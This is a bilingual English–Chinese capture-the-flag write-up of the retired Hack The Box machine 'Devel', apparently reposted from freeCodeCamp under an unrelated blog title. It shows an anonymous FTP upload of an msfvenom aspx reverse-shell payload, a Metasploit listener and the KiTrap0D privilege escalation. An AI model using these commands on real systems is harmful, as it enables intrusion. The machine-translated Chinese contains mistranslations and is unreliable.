安卓游戏开发推箱子
Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them simulating real world scenarios and some of them leaning more towards a CTF style of challenge.
Hack The Box(HTB)是一个在线平台,可让您测试渗透测试技能。 它包含一些不断更新的挑战。 其中一些模拟现实世界的场景,而另一些则更倾向于CTF的挑战风格。
Note. Only write-ups of retired HTB machines are allowed.
注意 。 只允许注销HTB机器。
Devel is described as a relatively simple box that demonstrates the security risks associated with some default program configurations. It is a beginner-level machine which can be completed using publicly available exploits.
Devel被描述为一个相对简单的方框,它展示了与某些默认程序配置相关的安全风险。 它是初学者级别的机器,可以使用公开的漏洞利用来完成。
We will use the following tools to pawn the box on a Kali Linux box
我们将使用以下工具将盒子当成Kali Linux盒子
第1步-扫描网络 (Step 1 - Scanning the network)
The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.
开发机器之前的第一步是进行一些扫描和侦察。
This is one of the most important parts as it will determine what you can try to exploit afterwards. It is always better to spend more time on that phase to get as much information as possible.
这是最重要的部分之一,因为它将决定您以后可以尝试利用的内容。 最好在该阶段花费更多时间以获取尽可能多的信息。
I will use Nmap (Network Mapper), which is a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.
我将使用Nmap (网络映射器),这是一个免费的开源实用程序,用于网络发现和安全审核。 它使用原始IP数据包来确定网络上可用的主机,这些主机提供的服务,它们正在运行的操作系统,使用的数据包过滤器/防火墙的类型以及许多其他特征。
There are many commands you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here.
此工具可以使用许多命令来扫描网络。 如果您想了解更多信息,可以在这里查看文档。
I use the following command to get a basic idea of what we are scanning
我使用以下命令来了解我们正在扫描的内容
nmap -sV -O -F --version-light 10.10.10.5-sV: Probe open ports to determine service/version info
-sV:探测打开的端口以确定服务/版本信息
-O: Enable OS detection
-O:启用操作系统检测
-F: Fast mode - Scan fewer ports than the default scan
-F:快速模式-扫描的端口少于默认扫描
--version-light: Limit to most likely probes (intensity 2)
--version-light:限制为最可能的探测(强度2)
10.10.10.5: IP address of the Devel box
10.10.10。 5 :开发箱的IP地址
You can also use Zenmap, which is the official Nmap Security Scanner GUI. It is a multi-platform, free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users.
您还可以使用Zenmap ,这是官方的Nmap Security Scanner GUI。 它是一个多平台,免费和开源的应用程序,旨在使Nmap易于初学者使用,同时为经验丰富的Nmap用户提供高级功能。
I use a different set of commands to perform an intensive scan
我使用一组不同的命令来执行密集扫描
nmap -A -v 10.10.10.5-A: Enable OS detection, version detection, script scanning, and traceroute
-A:启用操作系统检测,版本检测,脚本扫描和跟踪路由
-v: Increase verbosity level
-v:提高详细程度
10.10.10.5: IP address of the Devel box
10.10.10.5:开发箱的IP地址
If you find the results a little bit too overwhelming, you can move to the Ports/Hosts tab to only get the open ports.
如果发现结果有点不堪重负,则可以移至“ 端口/主机”选项卡以仅获取打开的端口。
We can see that there are 2 open ports:
我们可以看到有2个开放端口:
Port 21. File Transfer Protocol (FTP) control (command). Here it's a Microsoft FTP
端口 21 。 文件传输协议(FTP)控件(命令)。 这是Microsoft FTP
Port 80. Hypertext Transfer Protocol (HTTP). Here it's an IIS server
端口 80 。 超文本传输协议(HTTP)。 这是IIS服务器
The most likely initial attack vector appears to be the FTP in this case
在这种情况下,最有可能的初始攻击媒介似乎是FTP
第2步-易受攻击的FTP (Step 2 - The vulnerable FTP)
We open Firefox and visit the website at http://10.10.10.5
我们打开Firefox并访问http://10.10.10.5的网站
From the reconnaissance phase, we found 2 files under the Microsoft FTP. Let's see if we can access them from the browser.
从侦查阶段开始,我们在Microsoft FTP下找到了2个文件。 让我们看看是否可以从浏览器访问它们。
I can access the welcome.png image file by visiting
我可以通过访问访问welcome.png图像文件
http://10.10.10.5/welcome.pngI can also access the iisstart.htm page
我也可以访问iisstart.htm页面
http://10.10.10.5/iisstart.htmWe now know two things:
现在,我们知道两件事:
- The FTP is used as a file directory for the web server - discovered when we accessed the files from the recon phase. FTP用作Web服务器的文件目录-在我们从侦察阶段访问文件时发现。
- The FTP allows anonymous login - discovered when we performed the intense scan. FTP允许匿名登录-在我们执行密集扫描时发现。
Let's see if we can create a file and add it to the FTP
让我们看看是否可以创建文件并将其添加到FTP
I create a file by using this command and output the result to a file called htb.html
我使用此命令创建文件,并将结果输出到名为htb.html的文件中
echo HackTheBox > htb.htmlI then check with ls if the file has been created and what is the content of the file with this command
然后,我用ls检查该文件是否已创建以及该命令的文件内容是什么
cat htb.htmlLet's now connect to the FTP to add our test file
现在,我们连接到FTP以添加我们的测试文件
To connect to the FTP, I use this command
要连接到FTP,我使用以下命令
ftp 10.10.10.5I type anonymous as the username and just press enter for the password, as it allows anonymous login.
我输入匿名作为用户名,然后按Enter键输入密码,因为它允许匿名登录。
I am now connected to the FTP.
我现在已连接到FTP。
I add the file on the FTP with this command
我使用此命令将文件添加到FTP
put htb.htmlThe file has been successfully sent over. Let's check if we can access it from Firefox. I visit the page and we can see the output HackTheBox on the web page.
文件已成功发送。 让我们检查是否可以从Firefox访问它。 我访问了该页面,我们可以在网页上看到输出HackTheBox 。
http://10.10.10.5/htb.htmlNow that we know we can send over files, let's craft an exploit!
现在我们知道可以发送文件了,让我们来设计一个漏洞利用程序!
第3步-使用MSFvenom进行漏洞利用 (Step 3 - Using MSFvenom to craft an exploit)
We will use MSFvenom, which is a payload generator . You can learn more about it here
我们将使用MSFvenom,它是有效负载生成器。 您可以在此处了解更多信息
But first, let's check on Metasploit Framework which payload we will need to craft our exploit.
但是首先,让我们检查一下Metasploit Framework制作漏洞利用程序所需的有效负载。
We know that we need to create a reverse shell, which is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, which by using, code or command execution is achieved.
我们知道我们需要创建一个反向shell ,这是目标计算机与攻击计算机进行通信的一种shell。 攻击机具有一个侦听器端口,在侦听器端口上接收连接,通过使用该连接,可以执行代码或命令。
The reverse TCP shell should be for Windows and we will use Meterpreter.
反向TCP Shell应该用于Windows,我们将使用Meterpreter 。
From the Offensive Security website, we get this definition for Meterpreter
从“进攻性安全”网站上,我们获得了Meterpreter的定义
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
Meterpreter是一种高级的,动态可扩展的有效负载,它使用内存中的 DLL注入暂存器,并在运行时通过网络进行了扩展。 它通过暂存器套接字进行通信,并提供全面的客户端Ruby API。 它具有命令历史记录,制表符完成,通道等功能。
You can read more about Meterpreter here.
您可以在此处阅读有关Meterpreter的更多信息。
I launch Metasploit and search for reverse TCP payloads. I use the following command
我启动Metasploit并搜索反向TCP有效负载。 我使用以下命令
search windows/meterpreter/reverse_tcpWe find an interesting payload, number 2, which is a Reverse TCP Stager. This payload injects the meterpreter server DLL via the Reflective Dll Injection payload and connects back to the attacker
我们找到了一个有趣的有效负载,编号2,它是反向TCP阶段程序 。 该有效负载通过Reflective Dll Injection有效负载注入抄表器服务器DLL,并连接回攻击者
payload/windows/meterpreter/reverse_tcpNow let's go back to msfvenom to craft our exploit. And more specifically an aspx reverse shell. This piece of information has been collected during recon phase
现在让我们回到msfvenom来设计我们的漏洞利用程序。 更具体地说是aspx反向外壳。 这条信息是在侦察阶段收集的
I use the following command
我使用以下命令
msfvenom -p windows/meterpreter/reverse_tcp -f aspx -o devel.aspx LHOST=10.10.14.15 LPORT=4444-p: Payload to use
- P:有效载荷来使用
-f: Output format
- F:输出格式
-0: Save the payload to a file
- 0:保存有效载荷到一个文件
LHOST: Local host
LHOST :本地主机
LPORT: Local port
LPORT :本地端口
I then check with ls if the file has been created. It's time to send it over to the FTP
然后,我用ls检查是否已创建文件。 是时候将其发送到FTP了
Let's reconnect to the FTP and send our little gift!
让我们重新连接到FTP并发送我们的小礼物!
I connect to the FTP, enter anonymous as a username, skip the password by pressing enter. I then send the file with the following command
我连接到FTP,输入匿名作为用户名,然后按Enter跳过密码。 然后,我使用以下命令发送文件
put devel.aspxLet's check if the file has been correctly sent over. Going back to Firefox, I navigate to the FTP server with the following command
让我们检查文件是否已正确发送。 回到Firefox ,我使用以下命令导航到FTP服务器
ftp://10.10.10.5We can see that our little gift is here!
我们可以看到我们的小礼物在这里!
Here is the exploit, if you're curious to know what it looks like
这是漏洞利用程序,如果您想知道它是什么样子
第4步-使用Metasploit设置侦听器 (Step 4 - Setting up a listener with Metasploit)
Back on Metasploit where I use the following command to set the payload handler
回到Metasploit,在这里我使用以下命令设置有效负载处理程序
use exploit/multi/handlerI check to see which options are available
我检查一下哪些选项可用
We first set up the payload
我们首先设置有效载荷
set payload windows/meterpreter/reverse_tcpThen the LHOST
然后LHOST
set lhost 10.10.14.15And finally the LPORT
最后是LPORT
set lport 4444If we check the options now, we should see that everything is set up
如果我们现在检查选项,我们应该看到一切都已设置
Let's run the exploit.
让我们运行漏洞利用程序。
After this message appears
此消息出现后
Started reverse TCP handler on 10.10.14.15:4444go back to the browser and access the page where the malicious script is hosted
返回浏览器并访问托管恶意脚本的页面
http://10.10.10.5/devel.aspxYou should then see a Meterpreter session created
然后,您应该看到一个Meterpreter会话已创建
Now that I have a session, I try to look for the first flag, user.txt using the following command on meterpreter
现在我已经有了一个会话,我尝试在meterpreter上使用以下命令查找第一个标志user.txt
search -f user.txtNo files are matching my search. I try with .* to see other files, but nothing useful
没有文件与我的搜索匹配。 我尝试使用。*查看其他文件,但没什么用
I then create a shell with the following command
然后,使用以下命令创建外壳
shellI use the following command to get the system information
我使用以下命令获取系统信息
systeminfoWe can see that the registered owner is called babis. This might an important piece of information when we will be looking for the user flag. We can also see that the machine doesn't have any hotfixes.
我们可以看到注册所有者称为babis 。 当我们要寻找用户标志时,这可能是一条重要的信息。 我们还可以看到该机器没有任何修补程序。
I start navigating through the folders. I use dir to list all files/folders and cd to change directory. I try my luck on the babis and Administrator folders, but both gave me Access denied.
我开始浏览文件夹。 我使用dir列出所有文件/文件夹,并使用cd更改目录。 我在babis和Administrator文件夹上尝试过运气,但两者均使我无法访问。
We need to escalate privilege! Knowing that when we checked for the system information, no hotfixes were found, we can try to find exploits applicable to this machine.
我们需要提升特权! 知道当我们检查系统信息时,找不到修补程序,因此我们可以尝试查找适用于此计算机的漏洞利用程序。
步骤5-执行特权升级 (Step 5 - Performing Privilege Escalation)
I put the session in the background with this command
我使用此命令将会话置于后台
backgroundI then use the following command
然后,我使用以下命令
use post/multi/recon/local_exploit_suggesterThis module suggests local Meterpreter exploits that can be used. The exploits are suggested based on the architecture and platform that the user has a shell opened as well as the available exploits in Meterpreter
本模块建议可以使用的本地Meterpreter利用。 根据用户打开外壳的体系结构和平台以及Meterpreter中的可用漏洞,建议利用漏洞
I check the options and I set the session
我检查选项并设置会话
It's important to note that not all local exploits will be fired. Exploits are chosen based on these conditions: session type, platform, architecture, and required default options
重要的是要注意,并非所有本地漏洞都会被解雇。 根据以下条件选择漏洞利用:会话类型,平台,体系结构和所需的默认选项
Going down the list
进入清单
exploit/windows/local/bypassuac_eventvwrfails due to the IIS user not being a part of the administrators group, which is the default and to be expected.
由于IIS用户不是管理员组的一部分而失败,这是默认情况,这是预期的,因此失败。
I use the next exploit on the list, which is
我使用列表中的下一个漏洞,即
use exploit/windows/local/ms10_015_kitrap0dThis module will create a new session with SYSTEM privileges via the KiTrap0D exploit by Tavis Ormandy. If the session in use is already elevated then the exploit will not run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows.
该模块将通过Tavis Ormandy的KiTrap0D漏洞创建一个具有SYSTEM特权的新会话。 如果正在使用的会话已经提升,则利用将无法运行。 该模块依赖kitrap0d.x86.dll,而Windows x64版本不支持该模块。
When we ran the sysinfo in the Meterpreter session, it revealed that the target was x86 architecture
当我们在Meterpreter会话中运行sysinfo时,它表明目标是x86体系结构
I check the options and then set the session
我检查选项,然后设置会话
I run the exploit.
我运行漏洞利用程序。
The exploit was successful, but the session couldn't be created. This is because of the first line in the exploit trying to set up a reverse handler on the default eth0 and default port, and not the VPN interface for HTB labs.
该漏洞利用成功,但无法创建会话。 这是因为漏洞利用的第一行试图在默认的eth0和默认端口(而不是HTB实验室的VPN接口)上设置反向处理程序。
Started reverse TCP handler on 10.0.2.15:4444I check the options and set LHOST and LPORT
我检查选项并设置LHOST和LPORT
I then check all the sessions alive with the following command, in case my session died
然后,使用以下命令检查所有活动会话,以防我的会话死亡
sessions -lI can see my session
我可以看到我的会议
Now that we have a meterpreter session, let's start navigating the folder and find the flags!
现在我们有了一个抄表器会话,让我们开始浏览该文件夹并找到标记!
步骤6-寻找user.txt标志 (Step 6 - Looking for the user.txt flag)
Let's first check where we are with the following command
我们首先使用以下命令检查我们的位置
pwdwhich stands for print work directory
代表打印工作目录
I go up to C:\ and ls all the files/folders. I already know where to look from my previous attempt in Step 4 - Setting up a listener with Metasploit
我要到C:\和LS中的所有文件/文件夹。 我从步骤4-使用Metasploit设置侦听器中的上一次尝试中已经知道要看的地方
I go back to the Users directory
我回到用户目录
Then move to the babis directory
然后移至babis目录
From there, I go to the Desktop directory
从那里,我转到桌面目录
We found the user.txt.txt file! To read the content of the file I use the command
我们找到了user.txt.txt文件! 要读取文件的内容,请使用以下命令
cat user.txt.txtNow that we have the user flag, let's find the root flag!
现在有了用户标志,让我们找到根标志!
步骤7-寻找root.txt标志 (Step 7 - Looking for the root.txt flag)
Going back to C:\ to navigate to the Administrator folder then the Desktop folder. I use ls to list all files under the Desktop folder
返回到C:\ ,导航到Administrator文件夹,然后导航到Desktop文件夹。 我使用ls列出“ 桌面”文件夹下的所有文件
We find the root.txt.txt file!
我们找到了root.txt.txt文件!
To read the content of the file I use the command
要读取文件的内容,请使用以下命令
cat root.txt.txtCongrats! You found both flags!
恭喜! 您找到了两个标志!
Please don’t hesitate to comment, ask questions or share with your friends :)
请不要犹豫,发表评论,提问或与您的朋友分享:)
You can see more of my articles here
您可以在这里看到更多我的文章
You can follow me on Twitter or on LinkedIn
And don't forget to #GetSecure, #BeSecure & #StaySecure!
并且不要忘记# GetSecure ,# BeSecure和#StaySecure !
Other Hack The Box articles
其他Hack The Box文章
翻译自: https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-devel/
安卓游戏开发推箱子
3309
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
